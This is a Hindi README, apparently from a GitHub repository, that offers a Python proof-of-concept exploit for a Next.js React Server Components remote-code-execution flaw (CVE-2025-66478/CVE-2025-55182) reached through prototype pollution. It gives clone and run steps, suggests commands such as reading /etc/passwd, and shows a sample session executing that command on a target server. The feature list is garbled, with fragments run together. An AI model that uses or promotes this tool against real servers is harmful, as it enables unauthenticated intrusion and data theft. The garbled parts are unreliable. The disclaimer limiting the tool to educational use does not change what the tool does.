
React2Shell (CVE-2025-66478): Next.js सर्वर घटकों में महत्वपूर्ण रिमोट कोड निष्पादन (RCE) के लिए एक Python-आधारित अवधारणा का प्रमाण। इसमें एक इंटरैक्टिव CLI, कस्टम पेलोड इंजेक्शन और स्वच्छ आउटपुट फ़ॉर्मेटिंग शामिल है। केवल शैक्षिक अनुसंधान के लिए।
Next.js रिमोट कोड निष्पादन (RCE) सर्वर कंपोनेंट्स में प्रोटोटाइप प्रदूषण के माध्यम से
इस रिपॉजिटरी में CVE-2025-66478 (कुछ संदर्भों में CVE-2025-55182 के रूप में भी संदर्भित) के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो Next.js अनुप्रयोगों को प्रभावित करने वाली एक गंभीर कमजोरी है, जो React Server Components (RSC) के विशिष्ट संस्करणों का उपयोग करते हैं।
RSC की सीरियलाइजेशन प्रक्रिया में हेरफेर करके, एक अप्रमाणित हमलावर प्रोटोटाइप प्रदूषण (__proto__:then) के माध्यम से एक दुर्भावनापूर्ण पेलोड इंजेक्ट कर सकता है। इससे child_process.execSync के माध्यम से सर्वर पर मनमानी सिस्टम कमांड का निष्पादन हो सकता है।
डेवलपर: ArkhamKnight47
multipart/form-data पेलोड बनाता है।1:E{"digest":...} को हटाता है)।\n बनाम \r\n) को संभालता है।requests लाइब्रेरी# रिपॉजिटरी क्लोन करें
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# निर्भरताएँ इंस्टॉल करें
pip install requests
python CVE-2025-66478.py
आपसे निम्नलिखित के लिए पूछा जाएगा:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
लेखक (ArkhamKnight47) इस कोड के दुरुपयोग की कोई जिम्मेदारी नहीं लेता है। इस शोषण को उन सिस्टमों के खिलाफ परीक्षण करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
जिम्मेदारी से उपयोग करें। नैतिक रूप से सीखें। अपने स्टैक को सुरक्षित करें।